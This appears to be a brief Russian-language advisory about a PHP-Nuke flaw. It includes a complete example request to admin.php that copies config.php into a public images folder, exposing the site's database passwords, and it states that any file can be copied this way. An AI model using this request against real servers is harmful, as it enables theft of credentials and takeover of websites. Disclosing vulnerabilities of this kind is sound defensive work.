Уязвимость защиты в PHP-Nuke позволяет удаленному злоумышленнику копировать и перезаписывать файлы на сервере. 

Пример:

http://www.example.net/admin.php?upload=1&file= config.php&file_name=hacked.txt&wdir=/images/
&userfile=config.php&userfile_name=hacked.txt

После чего создастся файл: http://www.example.net/images/hacked.txt

В котором вы сможете увидеть содержимое config.php со всеми паролями к базе данных. Этим способом может быть скопирован любой другой файл.

Оставить мнение